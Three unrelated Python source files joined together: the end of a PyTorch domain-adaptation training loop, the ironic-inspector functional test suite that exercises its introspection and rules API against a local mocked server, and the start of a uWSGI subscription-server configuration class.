target_domain_labels = torch.ones(this_batch_size, 1, device=device)
# Get the domain loss for the target instances:
_, target_domain_out = model.forward(target_batch, alpha)
target_domain_loss = domain_loss_fn(target_domain_out, target_domain_labels)
# target_domain2_loss = domain_loss_fn(target_domain_out[1], target_domain_labels)
# Get sum loss update weights:
# domain adaptation:
# total_loss = task_loss + domain_weight * (domain_loss + target_domain_loss)
# Task only:
# total_loss = task_loss
# Domain only:
# total_loss = domain_loss + target_domain_loss
# Debugging with 2 domain classifiers:
# total_loss = domain_loss + domain2_loss + target_domain_loss + target_domain2_loss
# With regularization and DA term:
total_loss = (task_loss +
domain_weight * (domain_loss + target_domain_loss) +
reg_weight * reg_term)
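# Combined objective: task loss, plus the weighted domain-adversarial losses on
# the source and target batches, plus an L1 penalty that pushes the
# straight-through weights toward sparsity (the pivot-selection mechanism).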
# With regularization only:
# total_loss = task_loss + reg_term
epoch_loss += total_loss
total_loss.backward()
# for param in model.named_parameters():
# print(param[0])
# print(param[1])
optimizer.step()
# At the end of every epoch, examine domain accuracy and how many non-zero parameters we have
# unique_source_inds = np.unique(selected_source_inds)
# all_source_inds = np.arange(num_train_instances)
# eval_source_inds = np.setdiff1d(all_source_inds, unique_source_inds)
# source_eval_X = X_train[eval_source_inds]
# source_eval_y = y_train[eval_source_inds]
source_eval_X = X_task_valid
source_eval_y = y_task_valid
source_task_out, source_domain_out = model.forward( FloatTensor(source_eval_X.toarray()).to(device), alpha=0.)
# If using BCEWithLogitsLoss which would automatically do a sigmoid post-process
# source_task_out = nn.functional.sigmoid(source_task_out)
# source_domain_out = nn.functional.sigmoid(source_domain_out)
# source domain is 0, count up predictions where 1 - prediction = 1
# If using sigmoid outputs (0/1) with BCELoss
source_domain_preds = np.round(source_domain_out.cpu().data.numpy())
# if using Softmargin() loss (-1/1) with -1 as source domain
# source_domain_preds = np.round(((source_domain_out.cpu().data.numpy() * -1) + 1) / 2)
source_predicted_count = np.sum(1 - source_domain_preds)
source_domain_acc = source_predicted_count / len(source_eval_y)
target_eval_X = X_target_valid
_, target_domain_out = model.forward( FloatTensor(target_eval_X.toarray()).to(device), alpha=0.)
# If ussing with BCEWithLogitsLoss (see above)
# target_domain_out = nn.functional.sigmoid(target_domain_out)
# if using sigmoid output (0/1) with BCELoss
target_domain_preds = np.round(target_domain_out.cpu().data.numpy())
# if using Softmargin loss (-1/1) with 1 as target domain:
# target_domain_preds = np.round(((source_domain_out.cpu().data.numpy()) + 1) / 2)
target_predicted_count = np.sum(target_domain_preds)
domain_acc = (source_predicted_count + target_predicted_count) / (source_eval_X.shape[0] + target_eval_X.shape[0])
# if using 0/1 predictions:
source_y_pred = np.round(source_task_out.cpu().data.numpy()[:,0])
# if using -1/1 predictions? (-1 = not negated, 1 = negated)
# source_y_pred = np.round((source_task_out.cpu().data.numpy()[:,0] + 1) / 2)
# source_eval_y += 1
# source_eval_y /= 2
# predictions of 1 are the positive class: tps are where prediction and gold are 1
tps = np.sum(source_y_pred * source_eval_y)
true_preds = source_y_pred.sum()
true_labels = source_eval_y.sum()
recall = tps / true_labels
prec = 1.0 if true_preds == 0 else tps / true_preds
f1 = 0.0 if (recall + prec) == 0 else 2 * recall * prec / (recall + prec)
try:
weights = model.feature.input_layer.vector
num_zeros = (weights.data==0).sum()
near_zeros = (torch.abs(weights.data)<0.000001).sum()
print("Min (abs) weight: %f" % (torch.abs(weights).min()))
print("Max (abs) weight: %f" % (torch.abs(weights).max()))
print("Ave weight: %f" % (torch.abs(weights).mean()))
except AttributeError:
num_zeros = near_zeros = -1
print("[Source] Epoch %d: loss=%f\tzeros=%d\tnear_zeros=%d\tnum_insts=%d\tdom_acc=%f\tP=%f\tR=%f\tF=%f" % (epoch, epoch_loss, num_zeros, near_zeros, len(source_eval_y), domain_acc, prec, recall, f1))
weights = model.feature.input_layer.vector
ranked_inds = torch.sort(torch.abs(weights))[1]
pivots = ranked_inds[0,-1000:]
pivot_list = pivots.cpu().data.numpy().tolist()
# pivot_list.sort()
for pivot in pivot_list:
print('%d : %s' % (pivot, feature_map[pivot]))
if __name__ == '__main__':
main(sys.argv[1:])
|
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import functools
import json
import os
import sys
import tempfile
import time
import unittest
from unittest import mock
import urllib
import eventlet
import fixtures
from oslo_config import cfg
from oslo_config import fixture as config_fixture
from oslo_utils import timeutils
from oslo_utils import uuidutils
import pytz
import requests
from ironic_inspector.cmd import all as inspector_cmd
from ironic_inspector.cmd import dbsync
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector import db
from ironic_inspector import introspection_state as istate
from ironic_inspector import main
from ironic_inspector import node_cache
from ironic_inspector import rules
from ironic_inspector.test import base
from ironic_inspector.test.unit import test_rules
eventlet.monkey_patch()
CONF = """
[ironic]
auth_type=none
endpoint_override=http://url
[pxe_filter]
driver = noop
[DEFAULT]
debug = True
introspection_delay = 0
auth_strategy=noauth
transport_url=fake://
[database]
connection = sqlite:///%(db_file)s
[processing]
processing_hooks=$default_processing_hooks,lldp_basic
store_data = database
"""
DEFAULT_SLEEP = 2
TEST_CONF_FILE = None
def get_test_conf_file():
global TEST_CONF_FILE
if not TEST_CONF_FILE:
d = tempfile.mkdtemp()
TEST_CONF_FILE = os.path.join(d, 'test.conf')
db_file = os.path.join(d, 'test.db')
with open(TEST_CONF_FILE, 'wb') as fp:
content = CONF % {'db_file': db_file}
fp.write(content.encode('utf-8'))
return TEST_CONF_FILE
def get_error(response):
return response.json()['error']['message']
def _query_string(*field_names):
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
queries = []
for field_name in field_names:
field = kwargs.pop(field_name, None)
if field is not None:
queries.append('%s=%s' % (field_name, field))
query_string = '&'.join(queries)
if query_string:
query_string = '?' + query_string
return func(*args, query_string=query_string, **kwargs)
return inner
return outer
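# For example, a method decorated with @_query_string('marker', 'limit') and
# called as fn(marker='abc', limit=1) receives query_string='?marker=abc&limit=1';
# fields left as None are omitted from the query string entirely.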
class Base(base.NodeTest):
ROOT_URL = 'http://127.0.0.1:5050'
IS_FUNCTIONAL = True
def setUp(self):
super(Base, self).setUp()
rules.delete_all()
self.cli_fixture = self.useFixture(
fixtures.MockPatchObject(ir_utils, 'get_client'))
self.cli = self.cli_fixture.mock.return_value
self.cli.get_node.return_value = self.node
self.cli.patch_node.return_value = self.node
self.cli.nodes.return_value = [self.node]
self.patch = [
{'op': 'add', 'path': '/properties/cpus', 'value': '4'},
{'path': '/properties/cpu_arch', 'value': 'x86_64', 'op': 'add'},
{'op': 'add', 'path': '/properties/memory_mb', 'value': '12288'},
{'path': '/properties/local_gb', 'value': '999', 'op': 'add'}
]
self.patch_root_hints = [
{'op': 'add', 'path': '/properties/cpus', 'value': '4'},
{'path': '/properties/cpu_arch', 'value': 'x86_64', 'op': 'add'},
{'op': 'add', 'path': '/properties/memory_mb', 'value': '12288'},
{'path': '/properties/local_gb', 'value': '19', 'op': 'add'}
]
self.node.power_state = 'power off'
self.cfg = self.useFixture(config_fixture.Config())
conf_file = get_test_conf_file()
self.cfg.set_config_files([conf_file])
# FIXME(milan) FakeListener.poll calls time.sleep() which leads to
# busy polling with no sleep at all, effectively blocking the whole
# process by consuming all CPU cycles in a single thread. MonkeyPatch
# with eventlet.sleep seems to help this.
self.useFixture(fixtures.MonkeyPatch(
'oslo_messaging._drivers.impl_fake.time.sleep', eventlet.sleep))
def tearDown(self):
super(Base, self).tearDown()
node_cache._delete_node(self.uuid)
def call(self, method, endpoint, data=None, expect_error=None,
api_version=None):
if data is not None:
data = json.dumps(data)
endpoint = self.ROOT_URL + endpoint
headers = {'X-Auth-Token': 'token'}
if api_version:
headers[main._VERSION_HEADER] = '%d.%d' % api_version
res = getattr(requests, method.lower())(endpoint, data=data,
headers=headers)
if expect_error:
self.assertEqual(expect_error, res.status_code)
else:
if res.status_code >= 400:
msg = ('%(meth)s %(url)s failed with code %(code)s: %(msg)s' %
{'meth': method.upper(), 'url': endpoint,
'code': res.status_code, 'msg': get_error(res)})
raise AssertionError(msg)
return res
def call_introspect(self, uuid, manage_boot=True, **kwargs):
endpoint = '/v1/introspection/%s' % uuid
if manage_boot is not None:
endpoint = '%s?manage_boot=%s' % (endpoint, manage_boot)
return self.call('post', endpoint)
def call_get_status(self, uuid, **kwargs):
return self.call('get', '/v1/introspection/%s' % uuid, **kwargs).json()
def call_get_data(self, uuid, processed=True, **kwargs):
return self.call('get', '/v1/introspection/%s/data%s'
% (uuid, '' if processed else '/unprocessed'),
**kwargs).json()
@_query_string('marker', 'limit')
def call_get_statuses(self, query_string='', **kwargs):
path = '/v1/introspection'
return self.call('get', path + query_string, **kwargs).json()
def call_abort_introspect(self, uuid, **kwargs):
return self.call('post', '/v1/introspection/%s/abort' % uuid, **kwargs)
def call_reapply(self, uuid, **kwargs):
return self.call('post', '/v1/introspection/%s/data/unprocessed' %
uuid, **kwargs)
def call_continue(self, data, **kwargs):
return self.call('post', '/v1/continue', data=data, **kwargs).json()
def call_add_rule(self, data, **kwargs):
return self.call('post', '/v1/rules', data=data, **kwargs).json()
def call_list_rules(self, **kwargs):
return self.call('get', '/v1/rules', **kwargs).json()['rules']
def call_delete_rules(self, **kwargs):
self.call('delete', '/v1/rules', **kwargs)
def call_delete_rule(self, uuid, **kwargs):
self.call('delete', '/v1/rules/' + uuid, **kwargs)
def call_get_rule(self, uuid, **kwargs):
return self.call('get', '/v1/rules/' + uuid, **kwargs).json()
def _fake_status(self, finished=mock.ANY, state=mock.ANY, error=mock.ANY,
started_at=mock.ANY, finished_at=mock.ANY,
links=mock.ANY):
return {'uuid': self.uuid, 'finished': finished, 'error': error,
'state': state, 'finished_at': finished_at,
'started_at': started_at,
'links': [{u'href': u'%s/v1/introspection/%s' % (self.ROOT_URL,
self.uuid),
u'rel': u'self'}]}
def check_status(self, status, finished, state, error=None):
self.assertEqual(
self._fake_status(finished=finished,
state=state,
finished_at=finished and mock.ANY or None,
error=error),
status
)
curr_time = datetime.datetime.fromtimestamp(
time.time(), tz=pytz.timezone(time.tzname[0]))
started_at = timeutils.parse_isotime(status['started_at'])
self.assertLess(started_at, curr_time)
if finished:
finished_at = timeutils.parse_isotime(status['finished_at'])
self.assertLess(started_at, finished_at)
self.assertLess(finished_at, curr_time)
else:
self.assertIsNone(status['finished_at'])
def db_row(self):
"""return database row matching self.uuid."""
return db.model_query(db.Node).get(self.uuid)
class Test(Base):
def test_bmc(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
self.cli.create_port.assert_called_once_with(
node_uuid=self.uuid, address='11:22:33:44:55:66', extra={},
is_pxe_enabled=True)
self.assertTrue(self.cli.set_node_boot_device.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_port_creation_update_and_deletion(self):
cfg.CONF.set_override('add_ports', 'active', 'processing')
cfg.CONF.set_override('keep_ports', 'added', 'processing')
uuid_to_delete = uuidutils.generate_uuid()
uuid_to_update = uuidutils.generate_uuid()
# Two ports already exist: one with incorrect is_pxe_enabled, the other
# should be deleted.
self.cli.ports.return_value = [
mock.Mock(address=self.macs[1], id=uuid_to_update,
node_id=self.uuid, extra={}, is_pxe_enabled=True),
mock.Mock(address='foobar', id=uuid_to_delete,
node_id=self.uuid, extra={}, is_pxe_enabled=True),
]
# Two more ports are created, one with client_id. Make sure the
# returned object has the same properties as requested in create().
self.cli.create_port.side_effect = mock.Mock
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
calls = [
mock.call(node_uuid=self.uuid, address=self.macs[0],
extra={}, is_pxe_enabled=True),
mock.call(node_uuid=self.uuid, address=self.macs[2],
extra={'client-id': self.client_id},
is_pxe_enabled=False),
]
self.cli.create_port.assert_has_calls(calls, any_order=True)
self.cli.delete_port.assert_called_once_with(uuid_to_delete)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_port_not_update_pxe_enabled(self):
cfg.CONF.set_override('add_ports', 'active', 'processing')
cfg.CONF.set_override('keep_ports', 'added', 'processing')
cfg.CONF.set_override('update_pxe_enabled', False, 'processing')
uuid_to_update = uuidutils.generate_uuid()
# One port with incorrect pxe_enabled.
self.cli.ports.return_value = [
mock.Mock(address=self.macs[0], id=uuid_to_update,
node_id=self.uuid, extra={}, is_pxe_enabled=False)
]
# Two more ports are created, one with client_id. Make sure the
# returned object has the same properties as requested in create().
self.cli.create_port.side_effect = mock.Mock
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
calls = [
mock.call(node_uuid=self.uuid, address=self.macs[2],
extra={'client-id': self.client_id},
is_pxe_enabled=True),
]
self.assertFalse(self.cli.patch_port.called)
self.cli.create_port.assert_has_calls(calls, any_order=True)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_introspection_statuses(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
# NOTE(zhenguo): only test finished=False here, as we don't know
# other nodes status in this thread.
statuses = self.call_get_statuses().get('introspection')
self.assertIn(self._fake_status(finished=False), statuses)
# check we've got 1 status with a limit of 1
statuses = self.call_get_statuses(limit=1).get('introspection')
self.assertEqual(1, len(statuses))
all_statuses = self.call_get_statuses().get('introspection')
marker_statuses = self.call_get_statuses(
marker=self.uuid, limit=1).get('introspection')
marker_index = all_statuses.index(self.call_get_status(self.uuid))
# marker is the last row on previous page
self.assertEqual(all_statuses[marker_index+1:marker_index+2],
marker_statuses)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
# fetch all statuses and db nodes to assert pagination
statuses = self.call_get_statuses().get('introspection')
nodes = db.model_query(db.Node).order_by(
db.Node.started_at.desc()).all()
# assert ordering
self.assertEqual([node.uuid for node in nodes],
[status_.get('uuid') for status_ in statuses])
# assert pagination
half = len(nodes) // 2
marker = nodes[half].uuid
statuses = self.call_get_statuses(marker=marker).get('introspection')
self.assertEqual([node.uuid for node in nodes[half + 1:]],
[status_.get('uuid') for status_ in statuses])
# assert status links work
self.assertEqual([self.call_get_status(status_.get('uuid'))
for status_ in statuses],
[self.call('GET', urllib.parse.urlparse(
status_.get('links')[0].get('href')).path).json()
for status_ in statuses])
def test_manage_boot(self):
self.call_introspect(self.uuid, manage_boot=False)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.assertFalse(self.cli.set_node_power_state.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertFalse(self.cli.set_node_boot_device.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_rules_api(self):
res = self.call_list_rules()
self.assertEqual([], res)
rule = {
'conditions': [
{'op': 'eq', 'field': 'memory_mb', 'value': 1024},
],
'actions': [{'action': 'fail', 'message': 'boom'}],
'description': 'Cool actions',
'scope': "sniper's scope"
}
res = self.call_add_rule(rule)
self.assertTrue(res['uuid'])
rule['uuid'] = res['uuid']
rule['links'] = res['links']
rule['conditions'] = [
test_rules.BaseTest.condition_defaults(rule['conditions'][0]),
]
self.assertEqual(rule, res)
res = self.call('get', rule['links'][0]['href']).json()
self.assertEqual(rule, res)
res = self.call_list_rules()
self.assertEqual(rule['links'], res[0].pop('links'))
self.assertEqual([{'uuid': rule['uuid'],
'description': rule['description'],
'scope': rule['scope']}],
res)
res = self.call_get_rule(rule['uuid'])
self.assertEqual(rule, res)
self.call_delete_rule(rule['uuid'])
res = self.call_list_rules()
self.assertEqual([], res)
links = rule.pop('links')
del rule['uuid']
for _ in range(3):
self.call_add_rule(rule)
res = self.call_list_rules()
self.assertEqual(3, len(res))
self.call_delete_rules()
res = self.call_list_rules()
self.assertEqual([], res)
self.call('get', links[0]['href'], expect_error=404)
self.call('delete', links[0]['href'], expect_error=404)
def test_introspection_rules(self):
self.node.extra['bar'] = 'foo'
rules = [
{
'conditions': [
{'field': 'memory_mb', 'op': 'eq', 'value': 12288},
{'field': 'local_gb', 'op': 'gt', 'value': 998},
{'field': 'local_gb', 'op': 'lt', 'value': 1000},
{'field': 'local_gb', 'op': 'matches', 'value': '[0-9]+'},
{'field': 'cpu_arch', 'op': 'contains', 'value': '[0-9]+'},
{'field': 'root_disk.wwn', 'op': 'is-empty'},
{'field': 'inventory.interfaces[*].ipv4_address',
'op': 'contains', 'value': r'127\.0\.0\.1',
'invert': True, 'multiple': 'all'},
{'field': 'i.do.not.exist', 'op': 'is-empty'},
],
'actions': [
{'action': 'set-attribute', 'path': '/extra/foo',
'value': 'bar'}
]
},
{
'conditions': [
{'field': 'memory_mb', 'op': 'ge', 'value': 100500},
],
'actions': [
{'action': 'set-attribute', 'path': '/extra/bar',
'value': 'foo'},
{'action': 'fail', 'message': 'boom'}
]
},
]
for rule in rules:
self.call_add_rule(rule)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_any_call(
self.uuid,
[{'op': 'add', 'path': '/extra/foo', 'value': 'bar'}])
def test_conditions_scheme_actions_path(self):
rules = [
{
'conditions': [
{'field': 'node://properties.local_gb', 'op': 'eq',
'value': 40},
{'field': 'node://driver_info.ipmi_address', 'op': 'eq',
'value': self.bmc_address},
],
'actions': [
{'action': 'set-attribute', 'path': '/extra/foo',
'value': 'bar'}
]
},
{
'conditions': [
{'field': 'data://inventory.cpu.count', 'op': 'eq',
'value': self.data['inventory']['cpu']['count']},
],
'actions': [
{'action': 'set-attribute',
'path': '/driver_info/ipmi_address',
'value': '{data[inventory][bmc_address]}'}
]
}
]
for rule in rules:
self.call_add_rule(rule)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_any_call(
self.uuid,
[{'op': 'add', 'path': '/extra/foo', 'value': 'bar'}])
self.cli.patch_node.assert_any_call(
self.uuid,
[{'op': 'add', 'path': '/driver_info/ipmi_address',
'value': self.data['inventory']['bmc_address']}])
def test_root_device_hints(self):
self.node.properties['root_device'] = {'size': 20}
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.assertCalledWithPatch(self.patch_root_hints, self.cli.patch_node)
self.cli.create_port.assert_called_once_with(
node_uuid=self.uuid, address='11:22:33:44:55:66', extra={},
is_pxe_enabled=True)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_abort_introspection(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_abort_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.assertEqual(202, res.status_code)
status = self.call_get_status(self.uuid)
self.assertTrue(status['finished'])
self.assertEqual('Canceled by operator', status['error'])
# Note(mkovacik): we only check that this call doesn't succeed;
# there might be either a race condition (hard to test) that
# yields a 'Node already finished.' error, or an attribute-based
# look-up error from some pre-processing hooks, because
# node_info.finished() deletes the look-up attributes only
# after releasing the node lock
self.call('post', '/v1/continue', self.data, expect_error=400)
def test_stored_data_processing(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
inspect_started_at = timeutils.parse_isotime(status['started_at'])
self.check_status(status, finished=True, state=istate.States.finished)
data = self.call_get_data(self.uuid)
self.assertEqual(self.data['inventory'], data['inventory'])
self.assertIn('all_interfaces', data)
raw = self.call_get_data(self.uuid, processed=False)
self.assertEqual(self.data['inventory'], raw['inventory'])
self.assertNotIn('all_interfaces', raw)
res = self.call_reapply(self.uuid)
self.assertEqual(202, res.status_code)
self.assertEqual('{}\n', res.text)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
# checks the started_at updated in DB is correct
reapply_started_at = timeutils.parse_isotime(status['started_at'])
self.assertLess(inspect_started_at, reapply_started_at)
# second reapply call
res = self.call_reapply(self.uuid)
self.assertEqual(202, res.status_code)
self.assertEqual('{}\n', res.text)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
# Reapply with provided data
new_data = copy.deepcopy(self.data)
new_data['inventory']['cpu']['count'] = 42
res = self.call_reapply(self.uuid, data=new_data)
self.assertEqual(202, res.status_code)
self.assertEqual('{}\n', res.text)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.check_status(status, finished=True, state=istate.States.finished)
data = self.call_get_data(self.uuid)
self.assertEqual(42, data['inventory']['cpu']['count'])
def test_edge_state_transitions(self):
"""Assert state transitions work as expected in edge conditions."""
# multiple introspect calls
self.call_introspect(self.uuid)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
# an error -start-> starting state transition is possible
self.call_abort_introspect(self.uuid)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
# double abort works
self.call_abort_introspect(self.uuid)
status = self.call_get_status(self.uuid)
error = status['error']
self.check_status(status, finished=True, state=istate.States.error,
error=error)
self.call_abort_introspect(self.uuid)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.error,
error=error)
# preventing stale data race condition
# waiting -> processing is a strict state transition
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
row = self.db_row()
row.state = istate.States.processing
with db.ensure_transaction() as session:
row.save(session)
self.call_continue(self.data, expect_error=400)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.error,
error=mock.ANY)
self.assertIn('no defined transition', status['error'])
# multiple reapply calls
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_reapply(self.uuid)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished,
error=None)
self.call_reapply(self.uuid)
# assert a finished -reapply-> reapplying -> finished state transition
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished,
error=None)
def test_without_root_disk(self):
del self.data['root_disk']
self.inventory['disks'] = []
self.patch[-1] = {'path': '/properties/local_gb',
'value': '0', 'op': 'add'}
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
self.cli.create_port.assert_called_once_with(
node_uuid=self.uuid, extra={}, address='11:22:33:44:55:66',
is_pxe_enabled=True)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_lldp_plugin(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
updated_data = self.call_get_data(self.uuid)
lldp_out = updated_data['all_interfaces']['eth1']
expected_chassis_id = "11:22:33:aa:bb:cc"
expected_port_id = "734"
self.assertEqual(expected_chassis_id,
lldp_out['lldp_processed']['switch_chassis_id'])
self.assertEqual(expected_port_id,
lldp_out['lldp_processed']['switch_port_id'])
def test_update_unknown_active_node(self):
cfg.CONF.set_override('permit_active_introspection', True,
'processing')
self.node.provision_state = 'active'
self.cli.ports.return_value = [
mock.Mock(address='11:22:33:44:55:66', node_id=self.node.uuid)
]
# NOTE(dtantsur): we're not starting introspection in this test.
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
self.assertFalse(self.cli.create_port.called)
self.assertFalse(self.cli.set_node_boot_device.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_update_known_active_node(self):
# Start with a normal introspection as a pre-requisite
self.test_bmc()
self.cli.patch_node.reset_mock()
self.cli.set_node_boot_device.reset_mock()
self.cli.create_port.reset_mock()
# Provide some updates
self.data['inventory']['memory']['physical_mb'] = 16384
self.patch = [
{'op': 'add', 'path': '/properties/cpus', 'value': '4'},
{'path': '/properties/cpu_arch', 'value': 'x86_64', 'op': 'add'},
{'op': 'add', 'path': '/properties/memory_mb', 'value': '16384'},
{'path': '/properties/local_gb', 'value': '999', 'op': 'add'}
]
# Then continue with active node test
self.test_update_unknown_active_node()
@contextlib.contextmanager
def mocked_server():
conf_file = get_test_conf_file()
dbsync.main(args=['--config-file', conf_file, 'upgrade'])
cfg.CONF.reset()
cfg.CONF.unregister_opt(dbsync.command_opt)
eventlet.greenthread.spawn_n(inspector_cmd.main,
args=['--config-file', conf_file])
eventlet.greenthread.sleep(1)
# Wait up to 30 seconds for the service to start
for i in range(10):
try:
requests.get('http://127.0.0.1:5050/v1')
except requests.ConnectionError:
if i == 9:
raise
print('Service did not start yet')
eventlet.greenthread.sleep(3)
else:
break
# start testing
yield
# Make sure all processes finished executing
eventlet.greenthread.sleep(1)
if __name__ == '__main__':
if len(sys.argv) > 1:
test_name = sys.argv[1]
else:
test_name = None
with mocked_server():
unittest.main(verbosity=2, defaultTest=test_name)
|
|
from ..base import OptionsGroup
from ..exceptions import ConfigurationError
from ..utils import KeyValue, filter_locals
from .subscriptions_algos import *
class Subscriptions(OptionsGroup):
"""
This allows some uWSGI instances to announce their presence to a subscription-managing server,
which in turn can address those nodes (e.g. delegate request processing to them)
and automatically remove dead nodes from the pool.
Some routers provide subscription server functionality. See `.routing.routers`.
.. note:: Subscription system in many ways relies on Master Process.
.. warning:: The subscription system is meant for "trusted" networks.
All of the nodes in your network can potentially make a total mess with it.
* http://uwsgi.readthedocs.io/en/latest/SubscriptionServer.html
"""
class algorithms:
"""Balancing algorithms available to use with ``subscribe``."""
ip_hash = IpHash
least_reference_count = LeastReferenceCount
weighted_least_reference_count = WeightedLeastReferenceCount
weighted_round_robin = WeightedRoundRobin
def set_server_params(
self, *, client_notify_address=None, mountpoints_depth=None, require_vassal=None,
tolerance=None, tolerance_inactive=None, key_dot_split=None):
"""Sets subscription server related params.
:param str client_notify_address: Set the notification socket for subscriptions.
When you subscribe to a server, you can ask it to "acknowledge" the acceptance of
your request by pointing it to an address (Unix socket or UDP) on which your
instance will bind and to which the subscription server will send acknowledgements.
:param int mountpoints_depth: Enable support of mountpoints of certain depth for subscription system.
